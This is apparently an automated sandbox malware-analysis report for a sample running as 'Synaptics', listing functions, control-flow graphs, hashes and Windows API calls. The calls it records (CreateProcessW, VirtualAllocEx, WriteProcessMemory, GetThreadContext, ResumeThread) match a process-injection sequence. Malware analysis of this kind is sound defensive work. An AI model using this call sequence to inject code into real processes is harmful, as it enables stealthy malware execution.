                                                    • Instruction ID: 4f601cf3512763b5edf146e9b627b0b01130508729ca8f8bf9198980b65996d9
                                                    • Opcode Fuzzy Hash: cf4c8f3e2e720974de343dbcf2cb88cf7cd580e9633a44191f71c973235d2285
                                                    • Instruction Fuzzy Hash: 955156B09002499FEB14CFA9DA48BDEBBF5BF49304F248459E009A7360C7745984CB65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06050828 Relevance: 3.4, APIs: 2, Instructions: 353memorythreadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 39 6050828-60508f3 139 60508f5 call 6050d40 39->139 140 60508f5 call 6050d3c 39->140 43 60508fa-60508fc 44 6050902-6050937 43->44 45 6050cca-6050cdd 43->45 51 6050ce4-6050d06 44->51 52 605093d-6050947 44->52 45->51 71 6050d0f 51->71 72 6050d08-6050d0d 51->72 143 6050949 call 6050f70 52->143 144 6050949 call 6050f68 52->144 54 605094e-6050950 56 6050956-605095d 54->56 57 6050cb0-6050cc3 54->57 56->51 58 6050963-6050981 56->58 57->45 134 6050984 call 6051020 58->134 135 6050984 call 6051028 58->135 61 6050989-605098b 64 6050c96-6050ca9 61->64 65 6050991-6050994 61->65 64->57 66 6050996-60509d1 65->66 67 60509ec-6050a4d VirtualAllocEx 65->67 74 60509d3-60509d9 66->74 75 60509da-60509e6 66->75 81 6050a56-6050a65 67->81 82 6050a4f-6050a55 67->82 76 6050d11-6050d29 71->76 72->76 74->75 75->67 78 6050c7c-6050c8f 75->78 78->64 83 6050c62-6050c75 81->83 84 6050a6b-6050a76 81->84 82->81 83->78 145 6050a79 call 60510e2 84->145 146 6050a79 call 605119f 84->146 147 6050a79 call 60510e8 84->147 88 6050a7e-6050a80 90 6050a86-6050aa4 88->90 91 6050c48-6050c5b 88->91 95 6050aa6-6050ad1 90->95 96 6050b19-6050b2e 90->96 91->83 106 6050b10-6050b17 95->106 107 6050ad3-6050b00 95->107 136 6050b31 call 60510e2 96->136 137 6050b31 call 605119f 96->137 138 6050b31 call 60510e8 96->138 100 6050b36-6050b38 102 6050c14-6050c27 100->102 103 6050b3e-6050b5a 100->103 116 6050c2e-6050c41 102->116 103->51 109 6050b60-6050b66 103->109 106->95 106->96 131 6050b03 call 60510e2 107->131 132 6050b03 call 605119f 107->132 133 6050b03 call 60510e8 107->133 141 6050b69 call 6050f70 109->141 142 6050b69 call 6050f68 109->142 112 6050b6e-6050b70 113 6050b76-6050bae ResumeThread 112->113 114 6050bfa-6050c0d 112->114 117 6050bb7-6050bc4 113->117 118 6050bb0-6050bb6 113->118 114->102 116->91 120 6050bc6-6050bcc 117->120 121 6050be0-6050bf3 117->121 118->117 119 6050b08-6050b0a 119->106 119->116 120->72 125 6050bd2-6050bdb 120->125 121->114 125->72 131->119 132->119 133->119 134->61 135->61 136->100 137->100 138->100 139->43 140->43 141->112 142->112 143->54 144->54 145->88 146->88 147->88
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 06050A39
                                                    • ResumeThread.KERNELBASE(?), ref: 06050B9A
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: AllocResumeThreadVirtual
                                                    • String ID:
                                                    • API String ID: 234695336-0
                                                    • Opcode ID: 1efa3c92a7ba129999c1f4975b7f224210ed842eeb1b47dace0fec07528bb636
                                                    • Instruction ID: 05e11031984fc568e43ee5293a72690dfa3bb0edd0191e4dd620a4ee9237c19c
                                                    • Opcode Fuzzy Hash: 1efa3c92a7ba129999c1f4975b7f224210ed842eeb1b47dace0fec07528bb636
                                                    • Instruction Fuzzy Hash: 4BD19171E002198FDF64DBA4C950BDEBBF6AF89708F108569D40AAB380DB349D85CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06069460 Relevance: 3.3, Instructions: 3292COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 148 6069460-606946c 149 6069470-6069476 148->149 150 606946e 148->150 151 60694a7-6069528 149->151 152 6069478-606947d 149->152 150->149 163 606957f-60695a1 151->163 164 606952a-606956f 151->164 153 6069496-606949c 152->153 154 606947f-6069484 152->154 153->151 155 606949e-60694a6 153->155 847 6069486 call 6069450 154->847 848 6069486 call 6069460 154->848 157 606948c-606948f 157->153 167 60695a5-60695bc 163->167 168 60695a3 163->168 849 6069571 call 606ce30 164->849 850 6069571 call 606ce80 164->850 851 6069571 call 606cdc8 164->851 852 6069571 call 606cdd8 164->852 171 60695be-60695c8 167->171 172 60695c9-606975d 167->172 168->167 197 6069763-60697bd 172->197 198 606cd3a-606cd78 172->198 175 6069577-606957e 197->198 204 60697c3-606c562 197->204 204->198 755 606c568-606c5d7 204->755 755->198 760 606c5dd-606c64c 755->760 760->198 765 606c652-606cbcb 760->765 765->198 830 606cbd1-606cd39 765->830 847->157 848->157 849->175 850->175 851->175 852->175
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: babc5bc42f4bbc990984eec8a259c9fcfb48ebe3717dca09b0c71b424fabe6b3
                                                    • Instruction ID: 70b042453daef9a02476f2676c6c00e83f42e92a99b886b6678ea6e7bd9d0b32
                                                    • Opcode Fuzzy Hash: babc5bc42f4bbc990984eec8a259c9fcfb48ebe3717dca09b0c71b424fabe6b3
                                                    • Instruction Fuzzy Hash: 2D636E70A4022DAFEB359B90CC55BEE76BAEF84704F1044E9E60A6B2D0DB751E80DF45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06050818 Relevance: 3.3, APIs: 2, Instructions: 278memorythreadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 853 6050818-60508f3 957 60508f5 call 6050d40 853->957 958 60508f5 call 6050d3c 853->958 858 60508fa-60508fc 859 6050902-6050937 858->859 860 6050cca-6050cdd 858->860 866 6050ce4-6050d06 859->866 867 605093d-6050947 859->867 860->866 886 6050d0f 866->886 887 6050d08-6050d0d 866->887 961 6050949 call 6050f70 867->961 962 6050949 call 6050f68 867->962 869 605094e-6050950 871 6050956-605095d 869->871 872 6050cb0-6050cc3 869->872 871->866 873 6050963-6050981 871->873 872->860 952 6050984 call 6051020 873->952 953 6050984 call 6051028 873->953 876 6050989-605098b 879 6050c96-6050ca9 876->879 880 6050991-6050994 876->880 879->872 881 6050996-60509d1 880->881 882 60509ec-6050a4d VirtualAllocEx 880->882 889 60509d3-60509d9 881->889 890 60509da-60509e6 881->890 896 6050a56-6050a65 882->896 897 6050a4f-6050a55 882->897 891 6050d11-6050d29 886->891 887->891 889->890 890->882 893 6050c7c-6050c8f 890->893 893->879 898 6050c62-6050c75 896->898 899 6050a6b-6050a76 896->899 897->896 898->893 946 6050a79 call 60510e2 899->946 947 6050a79 call 605119f 899->947 948 6050a79 call 60510e8 899->948 903 6050a7e-6050a80 905 6050a86-6050aa4 903->905 906 6050c48-6050c5b 903->906 910 6050aa6-6050ad1 905->910 911 6050b19-6050b2e 905->911 906->898 921 6050b10-6050b17 910->921 922 6050ad3-6050b00 910->922 954 6050b31 call 60510e2 911->954 955 6050b31 call 605119f 911->955 956 6050b31 call 60510e8 911->956 915 6050b36-6050b38 917 6050c14-6050c27 915->917 918 6050b3e-6050b5a 915->918 931 6050c2e-6050c41 917->931 918->866 924 6050b60-6050b66 918->924 921->910 921->911 949 6050b03 call 60510e2 922->949 950 6050b03 call 605119f 922->950 951 6050b03 call 60510e8 922->951 959 6050b69 call 6050f70 924->959 960 6050b69 call 6050f68 924->960 927 6050b6e-6050b70 928 6050b76-6050bae ResumeThread 927->928 929 6050bfa-6050c0d 927->929 932 6050bb7-6050bc4 928->932 933 6050bb0-6050bb6 928->933 929->917 931->906 935 6050bc6-6050bcc 932->935 936 6050be0-6050bf3 932->936 933->932 934 6050b08-6050b0a 934->921 934->931 935->887 940 6050bd2-6050bdb 935->940 936->929 940->887 946->903 947->903 948->903 949->934 950->934 951->934 952->876 953->876 954->915 955->915 956->915 957->858 958->858 959->927 960->927 961->869 962->869
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 06050A39
                                                    • ResumeThread.KERNELBASE(?), ref: 06050B9A
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: AllocResumeThreadVirtual
                                                    • String ID:
                                                    • API String ID: 234695336-0
                                                    • Opcode ID: 609cc9ae962354750ba7e5f38c7be84e0f6fdaf35d795092d0fe96c20be54b13
                                                    • Instruction ID: bec4d830e4ed4530a1f28db505a8b945ea0aa729972fdf610d0144b44c0e6a0f
                                                    • Opcode Fuzzy Hash: 609cc9ae962354750ba7e5f38c7be84e0f6fdaf35d795092d0fe96c20be54b13
                                                    • Instruction Fuzzy Hash: A9B17271E402198FDBA0DFA4C884BDEBBB6BF84304F248569D419AB355DB70A885CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06050D3C Relevance: 1.6, APIs: 1, Instructions: 139processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 963 6050d3c-6050db9 965 6050dc1-6050dc8 963->965 966 6050dbb-6050dbe 963->966 967 6050dd3-6050de9 965->967 968 6050dca-6050dd0 965->968 966->965 969 6050df4-6050e8f CreateProcessW 967->969 970 6050deb-6050df1 967->970 968->967 972 6050e91-6050e97 969->972 973 6050e98-6050f0c 969->973 970->969 972->973 981 6050f1e-6050f25 973->981 982 6050f0e-6050f14 973->982 983 6050f27-6050f36 981->983 984 6050f3c 981->984 982->981 983->984 986 6050f3d 984->986 986->986
                                                    APIs
                                                    • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 06050E7C
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 382aedd9452d8430d5aa23dcde4f3ee2116a60f8f567b8dea9786bfbc2ef9cfc
                                                    • Instruction ID: 3fd8e849bb6592fb5ed4aa04274b0901b5551e9709424176ae53d035fbef82d7
                                                    • Opcode Fuzzy Hash: 382aedd9452d8430d5aa23dcde4f3ee2116a60f8f567b8dea9786bfbc2ef9cfc
                                                    • Instruction Fuzzy Hash: 91514671D012299FDF60CF99C984BDEBBB6FF49304F1084A9E949A7250D7709A88CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06050D40 Relevance: 1.6, APIs: 1, Instructions: 137processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 987 6050d40-6050db9 988 6050dc1-6050dc8 987->988 989 6050dbb-6050dbe 987->989 990 6050dd3-6050de9 988->990 991 6050dca-6050dd0 988->991 989->988 992 6050df4-6050e8f CreateProcessW 990->992 993 6050deb-6050df1 990->993 991->990 995 6050e91-6050e97 992->995 996 6050e98-6050f0c 992->996 993->992 995->996 1004 6050f1e-6050f25 996->1004 1005 6050f0e-6050f14 996->1005 1006 6050f27-6050f36 1004->1006 1007 6050f3c 1004->1007 1005->1004 1006->1007 1009 6050f3d 1007->1009 1009->1009
                                                    APIs
                                                    • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 06050E7C
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: a410042ce3c974af0514b23f7498548035c7cc36f9901c79380545a2b6a758be
                                                    • Instruction ID: 4bcea6794717318598caa5150c1f3cf8abf1cf9a56522e3e8675c5c6fc26c9b2
                                                    • Opcode Fuzzy Hash: a410042ce3c974af0514b23f7498548035c7cc36f9901c79380545a2b6a758be
                                                    • Instruction Fuzzy Hash: 69513571D012299FDF60CF99C984BDEBBB6BF49304F1184A9E909A7250D7709A88CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015DFCAC Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1010 15dfcac-15dfd1e 1011 15dfd29-15dfd30 1010->1011 1012 15dfd20-15dfd26 1010->1012 1013 15dfd3b-15dfd73 1011->1013 1014 15dfd32-15dfd38 1011->1014 1012->1011 1015 15dfd7b-15dfdda CreateWindowExW 1013->1015 1014->1013 1016 15dfddc-15dfde2 1015->1016 1017 15dfde3-15dfe1b 1015->1017 1016->1017 1021 15dfe1d-15dfe20 1017->1021 1022 15dfe28 1017->1022 1021->1022 1023 15dfe29 1022->1023 1023->1023
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 015DFDCA
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 7d77020b96262293fa25a4d3acf4d6aede72db35b12043cb055564c7deab8437
                                                    • Instruction ID: b88ffc1d2f1e3f5a24627aefaa4812f0212d1bb478ba2611859bf1c940931a61
                                                    • Opcode Fuzzy Hash: 7d77020b96262293fa25a4d3acf4d6aede72db35b12043cb055564c7deab8437
                                                    • Instruction Fuzzy Hash: 7951D0B5D003499FDB14CFA9C984ADDBFB5BF48314F24852AE419AB210D7749986CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015DFCB8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1024 15dfcb8-15dfd1e 1025 15dfd29-15dfd30 1024->1025 1026 15dfd20-15dfd26 1024->1026 1027 15dfd3b-15dfdda CreateWindowExW 1025->1027 1028 15dfd32-15dfd38 1025->1028 1026->1025 1030 15dfddc-15dfde2 1027->1030 1031 15dfde3-15dfe1b 1027->1031 1028->1027 1030->1031 1035 15dfe1d-15dfe20 1031->1035 1036 15dfe28 1031->1036 1035->1036 1037 15dfe29 1036->1037 1037->1037
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 015DFDCA
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 34c834e060d8a155808dd645af45d1c66ff809bcd678293acff13695d2989e4c
                                                    • Instruction ID: 45da405354f7c96eeb5fa0724d1ddbb49ea5f2421751153dd27942c47a77594b
                                                    • Opcode Fuzzy Hash: 34c834e060d8a155808dd645af45d1c66ff809bcd678293acff13695d2989e4c
                                                    • Instruction Fuzzy Hash: 6341B0B1D003099FDB14CF9AD984ADEBFB5FF48314F24852AE419AB250D774A986CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015D5345 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1038 15d5345-15d5346 1039 15d5349-15d534a 1038->1039 1040 15d5348 1038->1040 1041 15d534d-15d5411 CreateActCtxA 1039->1041 1042 15d534c 1039->1042 1040->1039 1044 15d541a-15d5474 1041->1044 1045 15d5413-15d5419 1041->1045 1042->1041 1052 15d5476-15d5479 1044->1052 1053 15d5483-15d5487 1044->1053 1045->1044 1052->1053 1054 15d5489-15d5495 1053->1054 1055 15d5498 1053->1055 1054->1055 1057 15d5499 1055->1057 1057->1057
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 015D5401
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: fe71253065339b88a8fdc60a9bf918fd0ce5d099e5500c7b2b7fb7f4f11e4df6
                                                    • Instruction ID: 2129ac6a3e46ac85f53c358bd0b197de3acb2d82c397e61ed2fa7270f768f535
                                                    • Opcode Fuzzy Hash: fe71253065339b88a8fdc60a9bf918fd0ce5d099e5500c7b2b7fb7f4f11e4df6
                                                    • Instruction Fuzzy Hash: AC411571D00619CFDF24CFA9C984BDDBBB5BF49308F20886AD449AB251EB711946CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015D3DE4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1058 15d3de4-15d5411 CreateActCtxA 1061 15d541a-15d5474 1058->1061 1062 15d5413-15d5419 1058->1062 1069 15d5476-15d5479 1061->1069 1070 15d5483-15d5487 1061->1070 1062->1061 1069->1070 1071 15d5489-15d5495 1070->1071 1072 15d5498 1070->1072 1071->1072 1074 15d5499 1072->1074 1074->1074
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 015D5401
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 4f586b86660860051f88c4ad08b9494078e08b0b5f31ccc9befb0f6ec6b1f0a5
                                                    • Instruction ID: 1e9714ea40bc9bb12a65b706b48ef8567917e7020d94cce4f90726d4a4f17ed7
                                                    • Opcode Fuzzy Hash: 4f586b86660860051f88c4ad08b9494078e08b0b5f31ccc9befb0f6ec6b1f0a5
                                                    • Instruction Fuzzy Hash: 3C41F271D00618CFDF24CFA9C984BCEBBB5BF49308F208469D409AB251DB716946CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015DB873 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1075 15db873-15db875 1076 15db878-15db90c DuplicateHandle 1075->1076 1077 15db90e-15db914 1076->1077 1078 15db915-15db932 1076->1078 1077->1078
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015DB8FF
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 49829d21ceb5f3f155496a51b9f206435a66e42ef153c7e2f833d96663d0b61f
                                                    • Instruction ID: 82bfb45b82cc242123c587f9252272daa8a30165d6dc34159aa0c208e485243c
                                                    • Opcode Fuzzy Hash: 49829d21ceb5f3f155496a51b9f206435a66e42ef153c7e2f833d96663d0b61f
                                                    • Instruction Fuzzy Hash: BF2116B5900218AFDB10CF99D984ADEBBF9FB49324F14842AE915A7310D374A944CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015DB878 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1081 15db878-15db90c DuplicateHandle 1082 15db90e-15db914 1081->1082 1083 15db915-15db932 1081->1083 1082->1083
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015DB8FF
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 180eedd309447cae3b148dc666a0c2106e467b224b5251085bb385dde8d652a3
                                                    • Instruction ID: 792f63a9c7ed15f8333bb0e27faa38c306b80605ed5077fe745e91ec34b7c223
                                                    • Opcode Fuzzy Hash: 180eedd309447cae3b148dc666a0c2106e467b224b5251085bb385dde8d652a3
                                                    • Instruction Fuzzy Hash: 7921F5B5900248AFDB10CF99D984ADEFBF9FB49324F14841AE955A7310D374A944CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 060510E2 Relevance: 1.6, APIs: 1, Instructions: 62injectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1086 60510e2-605112e 1088 6051130-6051136 1086->1088 1089 6051138-6051171 WriteProcessMemory 1086->1089 1088->1089 1090 6051173-6051179 1089->1090 1091 605117a-605119b 1089->1091 1090->1091
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06051164
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: bb04afb245a94b6245573b61b1a69f6a518e66a99879212b75c6d6798d43c028
                                                    • Instruction ID: e4cfea5e7f3bb8eabcdc6b9b736f93cf7c257862e3f8242f5d5026aa9c720875
                                                    • Opcode Fuzzy Hash: bb04afb245a94b6245573b61b1a69f6a518e66a99879212b75c6d6798d43c028
                                                    • Instruction Fuzzy Hash: D02107B19002199FDB50CFA9D984BDEBBF4FB08320F448469E914A7240D378A544CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 060510E8 Relevance: 1.6, APIs: 1, Instructions: 60injectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1093 60510e8-605112e 1094 6051130-6051136 1093->1094 1095 6051138-6051171 WriteProcessMemory 1093->1095 1094->1095 1096 6051173-6051179 1095->1096 1097 605117a-605119b 1095->1097 1096->1097
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06051164
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: edc883ec77d41fbc452d0ad94358aeae1d95b14ca2c7c3e6c48b5bc20fb617e7
                                                    • Instruction ID: b363c7939ac21e22e63dcc86774168066ecee228f223cafd06b307dce3392f2c
                                                    • Opcode Fuzzy Hash: edc883ec77d41fbc452d0ad94358aeae1d95b14ca2c7c3e6c48b5bc20fb617e7
                                                    • Instruction Fuzzy Hash: F12115B19003099FDB10CF99D984BDEBBF8FB08320F44846AE914A7240D378A644CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06051020 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06051099
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 2ce53250a8ee7b5622e8ad3c1be909e926fe1ff6356bb16b1eadf2de92fa896b
                                                    • Instruction ID: 253557dfaf609f1351e94b33d0fcbd1ada85c3b1b1e42e4feb07ea84494f61db
                                                    • Opcode Fuzzy Hash: 2ce53250a8ee7b5622e8ad3c1be909e926fe1ff6356bb16b1eadf2de92fa896b
                                                    • Instruction Fuzzy Hash: 8B21E3B5C012599FDB10CF9AD984BDEFBF8FB08320F14852AE959A3200C378A544CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06050F68 Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetThreadContext.KERNELBASE(?,00000000), ref: 06050FDB
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424880606.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: ContextThread
                                                    • String ID:
                                                    • API String ID: 1591575202-0
                                                    • Opcode ID: 15c6796525157243243c775310aac573a33674895c893897eaf4dad1ee639bd2
                                                    • Instruction ID: d69ce3584fb20aa866aa122997286c7b16731e101f93abbf76c02c3ecb47247b
                                                    • Opcode Fuzzy Hash: 15c6796525157243243c775310aac573a33674895c893897eaf4dad1ee639bd2
                                                    • Instruction Fuzzy Hash: 971156B2C406098FDB50CF9AC884BDEFFF4EB88320F158029E819A3600D338A545CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015D9450 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,015D9929,00000800,00000000,00000000), ref: 015D9B3A
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: e79270ddf6414b86d0b3e32f8d9f350d9e0c1b230c118fb4f0c273c47190110d
                                                    • Instruction ID: f1975977f02f1cde171cb89451fd2e830ae83b31652fdd6ce955379d321a6e92
                                                    • Opcode Fuzzy Hash: e79270ddf6414b86d0b3e32f8d9f350d9e0c1b230c118fb4f0c273c47190110d
                                                    • Instruction Fuzzy Hash: E51114B69042089FDB20CF9AC544BDEFBF4FB49324F14852AD95AB7200C374A545CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015D9AC9 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,015D9929,00000800,00000000,00000000), ref: 015D9B3A
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: ef9214397b1977bd42ffd8de38bcf544da605e5464a93e9704cbda2e99a7472a
